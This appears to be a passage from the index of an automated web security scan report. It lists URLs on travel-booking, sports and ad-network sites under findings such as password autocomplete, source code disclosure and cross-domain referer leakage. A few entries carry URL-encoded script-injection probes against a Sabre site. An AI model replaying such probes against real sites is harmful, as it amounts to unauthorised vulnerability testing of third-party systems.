14.51. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.52. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.53. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.54. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.55. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/f6866c92a8364fce80a4ac8ec97ff3af0ab1a91f759648ddbe8945b1fbc2a0c691c542d898873efe10f7b76c498ddb47cc43ec556e608db660d2da235157b5b9128144e031cdcb7ce883bc49bd6f4730c072d8a321c7d52ad125718084660403740fb6f080029b901e51b24a6221c496ceb95bab942b3a694ac765383e98e433393622f9d9f17e931a8eda17a812d683a6150e4b01c1e0f9ef4d85dc205723703dd0fc6f4124ba9072e2cc09f47b21bb5e672212e3bf7da7533d15f6a230f3710ab161f7f7a5b2a5a252d0a6ba81833bf9f72e776e1b061e383a6b4ac8ad21981ede323ce029e217dc6b4d3a767b82ede1afb1656cb9c46328b4e42351722cb1d0d00694805d504d7ee408963b59c5a0893a5345fde273fc33c0e2ae6543d340c434db5f5259b7c7a5f2ab848cc79dbebf67b9d533ae620852ed6c1d8920d6a293dfe8f9455e3509c5743fc507676071657ae654d7e8d39b07d29e1dc0de2e4372f95c7dc69176950b55e8a6452d713c02b77c0fd34c5119312dffa7d3723ea65f04253b14909bdfcd742cdedd8463497ed70186343273d6a7dc38dd0afe739fd0e2de4758ed2f619fcd61a33f241c15d3272636c5796d73761aa33cfc4bc40be761eaed05ab54419f5c774db5deebc8e4833933c2af78df019a9a326c24e6a99661a26fc6eeedb21a699fcab31cfc38689c60f666b098b2dd24a10e2b2801ea302c1b98bcfa9e50e84f373b269d6d2f7c1b4d28cd72ffdefaf3568c918f5240b9d3a75973ad955ba1cf4ce1a6687430fbfe8f238d3e1d50bb3de38e9966513f7b8d9814cea014bbe91045a7b3d6f41e0c0f30fcd6136d2216784d7da050198f0ca45cff981d25dcec38e29ec2ceabcdc69d0af985a319f277e893cdd705cc459b97a9f26f4f8c39db8a788cebbd56b8dbbb3be102559f17ed51fcf3971853502735446a1a8e4e673c9e1afef64e03a50b1c5ac11b9d02a126640e6e99925fd9c093efb0b093fed00776fae8b6a234b859eda6ebf7ead2a428a2aed140bda22bd319549c4fb4abd4520f933fd05556a3e6d6ba22da703548b4e7dae33bf5d75dda5069cc291a5d21f7457fb554ad2f7406babc64b17db2a18a0c2519aacfd9326004520a2af2e8bb3be2e167b47e96610a60345f48d763bbc0a7dc4f7a39b47c9801dffaadd31a10763ef4d4edbab6edde4160908762feaf55d3b14e034a5c8f914aa5d955986e97282a3fa74e19cfc572e502f6bdf268576d8cef039bd66133d42aac8dd6f6058e280d61404400220b20e735a9a73667798fda7d646935c4d8acb985ea69f8b3f1a7d923def6aba934941b3dda9836064000a5977ed64124fb6efac5661506723c89
3c81099fd42d42a3267cb2bf376fb91ab003a639be54757e1a4521a98a0cc1919024fe93c16cc95d1cc3761f72590a6a2a2ee078c6e44d87f93480221b85202df07007d97d8a356e3f8fb1962e543a9f04feb0616791ad0125373ad059162a71bbf171f1b26df160876eaf9338caf44f170855d2286eedea1c59d22676858ef53fd11c1ab5a04c6265b369b6fcab8dbf743de1ab8aafaa608973f2f35bfdd8625668ef2bf523b1d91bcd7fbf58e05b67c28d8c4e00a0cbe7a0392ce7e474bc1b86b63b253cbbf302542253da8424ddf9440265015aff36dad47ae90fa3000df4d6

14.56. https://secure.mlb.com/resetPassword.do

14.57. https://secure.mlb.com/shared/scripts/bam/bam.env.jsp

14.58. https://secure.mlb.com/style/bam.css.jsp

14.59. https://secure.mlb.com/style/nav_2011.jsp

14.60. http://travela.priceline.com/hotel/leaveBehindPop.do

14.61. http://travela.priceline.com/hotel/newHotelSearch.do

14.62. http://travela.priceline.com/hotel/searchHotels.do

14.63. http://travela.priceline.com/hotel/searchHotels_process.do

14.64. http://travela.priceline.com/hotel/searchResults.do

14.65. http://www.expedia.com/Boston-Hotels-The-Boston-Park-Plaza-Hotel-Towers.h4215.Hotel-Information

14.66. http://www.expedia.com/Details

14.67. http://www.expedia.com/Hotel-Search

14.68. http://www.expedia.com/Hotel-Search-WidgetInitJS

14.69. http://www.expedia.com/Hotels/Offers

14.70. http://www.expedia.com/Hotels/Offers

14.71. http://www.hublot.com/

14.72. http://www.jscache.com/weimg

14.73. http://www.priceline.com/QP.asp

14.74. http://www.priceline.com/hotels/lang/en-us/itinerary.asp

14.75. http://www.travelocity.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js

14.76. http://www.tripadvisor.com/CheckMore

14.77. http://www.tripadvisor.com/Commerce

14.78. http://www.tripadvisor.com/HotelCheckRates

14.79. http://www.tripadvisor.com/SmartDeals-g1-m11893

14.80. http://www.tripadvisor.com/SmartDeals-g60745-Boston_Massachusetts-Hotel-Deals.html

14.81. http://www.tripadvisor.com/img/cdsi/img2/ratings/partner/e5.0-13878-5.gif

14.82. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/3.0-11539-1.gif

14.83. http://www.tripadvisor.com/img/cdsi/img2/ratings/traveler/4.0-11539-1.gif

14.84. http://www.tripadvisor.com/img/cdsi/langs/en/tripadvisor_logo_207x51-12811-0.gif

14.85. http://www.tripadvisor.com/img/cdsi/partner/tripAdvisorLogo-11007-0.gif

14.86. http://www.tumri.net/ads/ads

14.87. http://a.collective-media.net/adj/cm.guardian/

14.88. http://a.collective-media.net/cmadj/cm.guardian/

14.89. http://a.intentmedia.net/adServer/beacons

14.90. http://a.intentmedia.net/adServer/impressions

14.91. http://a.tribalfusion.com/displayAd.js

14.92. http://a.tribalfusion.com/i.cid

14.93. http://a.tribalfusion.com/j.ad

14.94. http://a.tribalfusion.com/z/i.cid

14.95. http://ad.doubleclick.net/ad/N270.N270.EMEA_StratDev/B3867719.15

14.96. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

14.97. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

14.98. http://ad.doubleclick.net/adj/N3285.advertisingcom/B2343920.49

14.99. http://ad.doubleclick.net/adj/N4359.advertising.comOX2601/B5797640.2

14.100. http://ad.doubleclick.net/adj/N4610.153021.INTERCLICKNETWORK/B5581164.6

14.101. http://ad.doubleclick.net/adj/gna.en/level2

14.102. http://ad.doubleclick.net/clk

14.103. http://ads.pointroll.com/PortalServe/

14.104. http://ads2.adbrite.com/v0/ad

14.105. http://adserver.teracent.net/tase/ad

14.106. http://amch.questionmarket.com/adsc/d928398/20/44069375/decide.php

14.107. http://api.wipmania.com/jsonp

14.108. http://apis.google.com/js/plusone.js

14.109. http://ar.voicefive.com/b/wc_beacon.pli

14.110. http://ar.voicefive.com/bmx3/broker.pli

14.111. http://as.chango.com/links/adunit/1.31759988192e+12

14.112. http://as00.estara.com/fs/ruleaction.php

14.113. http://as00.estara.com/fs/rules.php

14.114. http://asset.userfly.com/users/20826/userfly.js

14.115. http://ats.tumri.net/ats/ats

14.116. http://b.scorecardresearch.com/b

14.117. http://b.scorecardresearch.com/p

14.118. http://b.scorecardresearch.com/r

14.119. http://b.voicefive.com/b

14.120. http://bh.contextweb.com/bh/rtset

14.121. http://bh.contextweb.com/bh/set.aspx

14.122. http://bid.openx.net/json

14.123. http://cas.criteo.com/delivery/admeld_map

14.124. http://cert.travelocity.com/___waseq.img

14.125. http://clk.atdmt.com/go/352348532/direct

14.126. http://cms.ad.yieldmanager.net/v1/cms

14.127. http://ctix8.cheaptickets.com/dcs4mzzicc2ep3maahjx8kl5c_7e2i/dcs.gif

14.128. http://ctix8.cheaptickets.com/dcsdlg96i00000clc5ljt8xox_8x1x/dcs.gif

14.129. http://ctix8.cheaptickets.com/dcstaccdt4h7cnabui8c1i31a_8m2q/dcs.gif

14.130. http://d.agkn.com/iframe!t=1168!

14.131. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTUwMy90LzAvY2F0LzM3MTExNzI

14.132. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/2944787775510337379/mchpid/3/url/

14.133. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/2944787775510337379/mchpid/9/url/

14.134. http://d.tradex.openx.com/afr.php

14.135. http://d.tradex.openx.com/lg.php

14.136. http://d.xp1.ru4.com/meta

14.137. http://d7.zedo.com/img/bh.gif

14.138. http://data.cmcore.com/imp

14.139. http://delivery.hotels.com/Hotels/Delivery.aspx

14.140. http://dm.travelocity.com/js.ng/site=travelocity&cobrand=TRAVELOCITY&adsize=1x1&area=homepage&tile=990892811131760&transactionID=642711317600486&random=908927341317600

14.141. http://ehg-twi.hitbox.com/HG

14.142. http://ehg-twi.hitbox.com/HG

14.143. http://ehg-twi.hitbox.com/HGct

14.144. http://extras.expedia.com/Hotels/Delivery/HSDirect.aspx

14.145. http://extras.expedia.com/Hotels/Delivery/ISDirect.aspx

14.146. http://ff.connextra.com/BlueSquare/selector/client

14.147. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/985248306/

14.148. http://i.w55c.net/ping_match.gif

14.149. http://image2.pubmatic.com/AdServer/Pug

14.150. http://images.hotelplanner.com/hotelimages/s/028000/028920A-thumb.jpg

14.151. http://imgwww.priceline.com/dcscx5l599uewfk6c3m90kij8_6z6b/dcs.gif

14.152. http://int.teracent.net/tase/int

14.153. http://int.teracent.net/tase/int

14.154. http://leadback.advertising.com/adcedge/lb

14.155. http://leadback.hotwire.db.advertising.com/adcedge/lb

14.156. http://lm.trafficmp.com/clicksense/pixel

14.157. http://loadm.exelator.com/load/

14.158. http://m.xp1.ru4.com/ad

14.159. http://m.xp1.ru4.com/meta

14.160. http://m.xp1.ru4.com/meta

14.161. http://m.xp1.ru4.com/meta

14.162. http://o-va1.wtp101.com/imp

14.163. http://o-va3.wtp101.com/imp

14.164. http://optimized-by.rubiconproject.com/a/7743/12359/21900-15.js

14.165. http://optimized-by.rubiconproject.com/a/7743/12359/21900-2.js

14.166. http://optimized-by.rubiconproject.com/a/7743/12359/21900-9.js

14.167. http://optimized-by.rubiconproject.com/a/7845/12566/22557-15.html

14.168. http://optimized-by.rubiconproject.com/a/7845/12566/22557-2.html

14.169. http://optimized-by.rubiconproject.com/a/7845/12566/26848-15.html

14.170. http://optimized-by.rubiconproject.com/a/8154/13209/25051-1.js

14.171. http://optimized-by.rubiconproject.com/a/8154/13209/25051-15.js

14.172. http://optimized-by.rubiconproject.com/a/8154/13209/25051-8.js

14.173. http://optimized-by.rubiconproject.com/a/dk.js

14.174. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.175. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.176. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.177. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.178. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.179. http://ots.optimize.webtrends.com/ots/ots/js-3.

14.180. http://pixel.rubiconproject.com/di.php

14.181. http://pixel.rubiconproject.com/tap.php

14.182. http://psa-d.openx.com/w/1.0/ajs

14.183. http://r.openx.net/set

14.184. http://r.turn.com/r/beacon

14.185. http://r.turn.com/r/cms/id/0/ddc/1/pid/43/uid/

14.186. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC85/rnd/xuPpW

14.187. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/

14.188. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=63830787/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

14.189. http://r1-ads.ace.advertising.com/site=793631/size=160600/u=2/bnum=74948035/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

14.190. http://r1-ads.ace.advertising.com/site=793633/size=728090/u=2/bnum=55878431/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

14.191. http://r1-ads.ace.advertising.com/site=797434/size=300250/u=2/bnum=24812117/hr=20/hl=8/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.igougo.com%252Fabout%252F

14.192. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=34930016/hr=19/hl=4/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelDetail.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253Ftab%253Dguide%2526tripType%253Dhotel%2526propertyId%253D4810%2526airport%253DBOS%2526resetReview%253Dtrue%2526hotelQKey%253D-2237575859332798600%2526tsHotelQKey%253D-2237575859332798600%2526reviewPage%253DreviewStart%2526locLink%253DHOTEL.HOTELAVAILABILITYLISTLITE1%257CNAT1%2526dr%253D4810A110Z114273A224Z46356A345Z10677A135Z601A159Z41209A139Z48167A178Z28920A139Z4643A90Z25625A159Z12989A129Z1013A189Z13360A152Z64654A166Z44777A136Z9773A129Z11430A84Z10448A97Z46065A125Z32162A99Z20077A108Z1228A169Z12056A109Z34410A99Z9074A149

14.193. http://r1-ads.ace.advertising.com/site=812162/size=160600/u=2/bnum=78334226/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

14.194. http://r1-ads.ace.advertising.com/site=812164/size=728090/u=2/bnum=23819479/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Ftravel.travelocity.com%252Fhotel%252FHotelAvailability.do%253Bjsessionid%253D74C1C04EA1B1607D7CD2E1313B9B2779.p0617%253FService%253DTRAVELOCITY%2526SEQ%253D1317600526540922011%2526pathIndicator%253DHOTEL_FRONTDOOR%2526leavingDate%253Dmm%252Fdd%252Fyyyy%2526returningDate%253Dmm%252Fdd%252Fyyyy%2526city%253Dbos%2526cityCountryCode%253DUS%2526dateFormat%253Dmm%252Fdd%252Fyyyy%2526searchMode%253Dcity%2526

14.195. http://rs.gwallet.com/r1/pixel/x1743

14.196. http://rs.gwallet.com/r1/pixel/x914r7675757

14.197. http://safebrowsing.clients.google.com/safebrowsing/downloads

14.198. http://sales.liveperson.net/hc/15744040/

14.199. http://serve.williamhill.com/promoLoadDisplay

14.200. http://servedby.flashtalking.com/click/1/16628

14.201. http://servedby.flashtalking.com/imp/1/16628

14.202. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.203. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.204. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.205. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.206. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.207. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.208. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.209. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.210. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.211. http://showadsak.pubmatic.com/AdServer/AdServerServlet

14.212. http://statse.webtrendslive.com/dcs0sd6z700000cpbndecaa4f_6n9k/dcs.gif

14.213. http://tag.admeld.com/id

14.214. http://tag.admeld.com/pixel

14.215. http://tag.contextweb.com/TagPublish/GetAd.aspx

14.216. http://tap.rubiconproject.com/oz/feeds/targus/profile

14.217. http://tap.rubiconproject.com/oz/sensor

14.218. http://tap.rubiconproject.com/partner/agent/rubicon/channels.js

14.219. http://travel.travelocity.com/hotel/HotelAvailability.do

14.220. http://travel.travelocity.com/hotel/HotelCobrand.do

14.221. http://travel.travelocity.com/hotel/HotelDetail.do

14.222. http://travel.travelocity.com/pub/gwt/hotel/esf/NoCacheAction.do

14.223. http://travela.priceline.com/sharedapps/scs

14.224. http://u.openx.net/w/1.0/sc

14.225. http://user.lucidmedia.com/clicksense/user

14.226. http://uxm.thousandeyes.com/rest/json

14.227. http://vitamine.networldmedia.net/bts/generic14.php

14.228. http://www.agoda.com/partners/partnersearch.aspx

14.229. http://www.burstnet.com/cgi-bin/ads/ad22156a.cgi/v=2.3S/sz=300x250A/NZ/9460/NF/RETURN-CODE/JS/

14.230. http://www.cheaptickets.com/shop/hotelsearch

14.231. http://www.expedia.com/Hotel-Search

14.232. http://www.expedia.com/TripPreferences

14.233. http://www.expedia.com/daily/common/mscookie.aspx

14.234. http://www.expedia.com/pubspec/scripts/eap.asp

14.235. http://www.getaroom.com/

14.236. http://www.getaroom.com/browse/market_deals

14.237. http://www.getaroom.com/searches/show

14.238. http://www.getaroom.com/searches/show

14.239. http://www.getaroom.com/washington-dc

14.240. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

14.241. http://www.hotelplanner.com/Search/Index.cfm

14.242. https://www.hotelplanner.com/Accept/Reserve.cfm

14.243. http://www.hotels.com/PPCHotelDetails

14.244. http://www.hotels.com/PPCSearch

14.245. http://www.hotels.com/compare/hotel_dockingbar.html

14.246. http://www.hotels.com/hotel/details.html

14.247. http://www.hotels.com/hotel/hoteldata.html

14.248. http://www.hotels.com/hoteldetails/urgencypopup.html

14.249. http://www.hotels.com/html/blank.html

14.250. http://www.hotels.com/html/tealeaf.html

14.251. http://www.hotels.com/search.do

14.252. http://www.hotels.com/search/search.html

14.253. http://www.hotels.com/selectors/en_US/

14.254. http://www.hotwire.com/hotel/results.jsp

14.255. http://www.hotwire.com/hotel/search-options.jsp

14.256. http://www.igougo.com/about/

14.257. http://www.igougo.com/traveldeals/ratefinder.aspx

14.258. http://www.luminate.com/widget/53d1ac1014/

14.259. http://www.orbitz.com/

14.260. http://www.orbitz.com/App/SubmitQuickSearch

14.261. http://www.orbitz.com/App/ViewDHTMLCalendar

14.262. http://www.orbitz.com/App/ViewFlightSearchResults

14.263. http://www.orbitz.com/shop/hotelsearch

14.264. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=519x225&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=225&rotator=true&width=519&adType=script&

14.265. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

14.266. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext2&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

14.267. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometext3&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

14.268. http://www.revresda.com/html.ng/channel=home&Section=main&adsize=hometextpkg&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

14.269. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=120x55_footer&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=55&width=120&

14.270. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=1&

14.271. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=2&

14.272. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=3&

14.273. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=1x1&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=1&width=1&adType=noframe&pos=4&

14.274. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=336x600&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=600&width=336&adType=noframe&pos=external&

14.275. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=396x71&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&

14.276. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=468x60_top&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=60&width=468&adType=noframe&

14.277. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=519x150&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&dsrc=7&height=150&width=519&adType=noframe&

14.278. http://www.revresda.com/js.ng/channel=home&Section=main&adsize=728x90&CookieName=OSC&secure=false&m=0&site=orbitz&subdomain=orbitz&group=A&tile=1317600406535&dsrc=7&height=90&width=728&adType=noframe&

14.279. http://www.sabreairlinesolutions.com/home/

14.280. http://www.sabretravelnetwork.com/home

14.281. http://www.sabretravelnetwork.com/home/

14.282. http://www.sabretravelnetwork.com/home/products_services

14.283. http://www.sabretravelnetwork.com/home/products_services/product_index/

14.284. http://www.sabretravelnetwork.com/home/products_services/product_index/images/loadingAnimation.gif

14.285. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/

14.286. http://www.sabretravelnetwork.com/home/products_services/travel_agency/contracts/images/loadingAnimation.gif

14.287. http://www.sabretravelnetwork.com/home/search/show_results

14.288. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3C/images/loadingAnimation.gif

14.289. http://www.sabretravelnetwork.com/home55bd4%22%3E%3Cscript%3Ealert(1)%3Cf18ac%22%3E%3Cscript%3Ealert(1)%3C/script%3E101846b9346/images/images/loadingAnimation.gif

14.290. http://www.sabretravelnetwork.com/home83d87%22%3E%3Cscript%3Ealert(1)%3C/script%3Efb97ed1345c/search/images/loadingAnimation.gif

14.291. http://www.sabretravelnetwork.com/images/home-text.png

14.292. http://www.wtp101.com/f

14.293. http://www.wtp101.com/pixel

14.294. http://www.wtp101.com/pull_sync

14.295. http://www.wtp101.com/push_sync

14.296. http://www9.effectivemeasure.net/v4/em_js

15. Password field with autocomplete enabled

15.1. http://www.booking.com/general.en-us.html

15.2. http://www.booking.com/hotel/us/c-boston-massachusettes.html

15.3. http://www.booking.com/hotel/us/copley-square.en-us.html

15.4. http://www.booking.com/index.en-us.html

15.5. http://www.booking.com/index.en-us.html

15.6. http://www.booking.com/searchresults.html

15.7. http://www.hotelplanner.com/Hotel/HotelRoomTypes.cfm

15.8. http://www.hotelplanner.com/Search/Index.cfm

15.9. https://www.hotelplanner.com/Accept/Reserve.cfm

15.10. http://www.manutd.com/

15.11. http://www.manutd.com/One-United/Login.aspx

15.12. http://www.manutd.com/One-United/Login.aspx

15.13. http://www.manutd.com/Search-Results.aspx

15.14. http://www.manutd.com/en.aspx

15.15. http://www.manutd.com/en/Club/Sponsors.aspx

15.16. http://www.manutd.com/en/Fanzone/Competition-And-Polls.aspx

15.17. http://www.manutd.com/en/News-And-Features/Football-News/2011/Oct/sir-alex-ferguson-proud-of-home-record-after-norwich-win.aspx

15.18. http://www.manutd.com/en/One-United.aspx

15.19. http://www.turkishairlines.com/en-CA/index.aspx

15.20. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

16. Source code disclosure

16.1. http://travela.priceline.com/hotel/js/searchValidation.js

16.2. http://travelocity.ugc.bazaarvoice.com/module/0025-en_us/cmn/0025-en_us/display.pkg.js

16.3. http://www.aon.com/manchesterunited/vagroundedstd-light-webfont.ttf

16.4. http://www.expedia.com/static/default/default/images/hotel-sprite.gif

16.5. http://www.expedia.com/static/default/default/images/infosite/bg_button_b.gif

16.6. http://www.expedia.com/static/default/default/images/infosite/bg_button_span_b.gif

16.7. http://www.expedia.com/static/default/default/images/infosite/button_beak_b.gif

16.8. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

16.9. http://www.expedia.com/static/default/default/images/infosite/rooms_left_middle.gif

16.10. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

16.11. http://www.expedia.com/static/fusion/v2.3/images/progressAnim.gif

16.12. http://www.goal.com/en/news/9/england/2011/10/01/2691360/anderson-confident-manchester-united-will-keep-unbeaten-run

16.13. http://www.hotels.com/bundles/enhanced_search-H36.0.2-128976.js

16.14. http://www.hotels.com/bundles/hcom-H36.0.2-128976.js

16.15. http://www.sabrehospitality.com/js/roundies.js

17. Referer-dependent response

17.1. http://d.tradex.openx.com/afr.php

17.2. http://delivery.hotels.com/Hotels/Delivery.aspx

17.3. http://extras.expedia.com/Hotels/Delivery/ISDirect.aspx

17.4. http://goal.us.intellitxt.com/intellitxt/front.asp

17.5. http://www.facebook.com/plugins/like.php

17.6. http://www.hotels.com/html/blank.html

18. Cross-domain POST

18.1. http://www.aon.com/site/products-services.jsp

18.2. http://www.aon.com/site/search.jsp

18.3. http://www.guardian.co.uk/football/2011/sep/27/manchester-united-basel-live

18.4. http://www.guardian.co.uk/football/manchester-united

18.5. http://www.sabreairlinesolutions.com/home/

18.6. http://www.turkishairlines.com/en-CA/index.aspx

18.7. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.8. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.9. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.10. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.11. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

18.12. http://www.turkishairlines.com/en-CA/quick_search_part.aspx

19. Cross-domain Referer leakage

19.1. http://a.collective-media.net/cmadj/cm.guardian/

19.2. http://ad.doubleclick.net/adi/N5282.161249.ADNETIK.COM/B5256632.283

19.3. http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15

19.4. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.28

19.5. http://ad.doubleclick.net/adi/N6054.Invitemedia.com/B5912738.30

19.6. http://ad.doubleclick.net/adi/N6333.1207.TRAVELOCITY.COM/B5568861.2

19.7. http://ad.doubleclick.net/adi/gna.en/level2

19.8. http://ad.doubleclick.net/adj/cm.guardian/

19.9. http://ad.doubleclick.net/adj/cm.guardian/

19.10. http://ad.doubleclick.net/adj/gna.en/level2

19.11. http://ad.doubleclick.net/adj/ta.ta.com.s/na.us.ma.boston

19.12. http://ad.turn.com/server/ads.js

19.13. http://ad.yieldmanager.com/iframe3

19.14. http://ad.yieldmanager.com/iframe3

19.15. http://ad.yieldmanager.com/iframe3

19.16. http://ad.yieldmanager.com/iframe3

19.17. http://ad.yieldmanager.com/iframe3

19.18. http://ad.yieldmanager.com/iframe3

19.19. http://ad.yieldmanager.com/iframe3

19.20. http://ad.yieldmanager.com/iframe3

19.21. http://ad.yieldmanager.com/iframe3

19.22. http://ad.yieldmanager.com/iframe3

19.23. http://ad.yieldmanager.com/iframe3

19.24. http://ad.yieldmanager.com/iframe3

19.25. http://ad.yieldmanager.com/iframe3

19.26. http://ad.yieldmanager.com/iframe3

19.27. http://ad.yieldmanager.com/iframe3

19.28. http://ad.yieldmanager.com/iframe3

19.29. http://ad.yieldmanager.com/iframe3

19.30. http://ad.yieldmanager.com/iframe3

19.31. http://ad.yieldmanager.com/iframe3

19.32. http://ad.yieldmanager.com/iframe3

19.33. http://ad.yieldmanager.com/iframe3

19.34. http://ad.yieldmanager.com/iframe3

19.35. http://ad.yieldmanager.com/iframe3

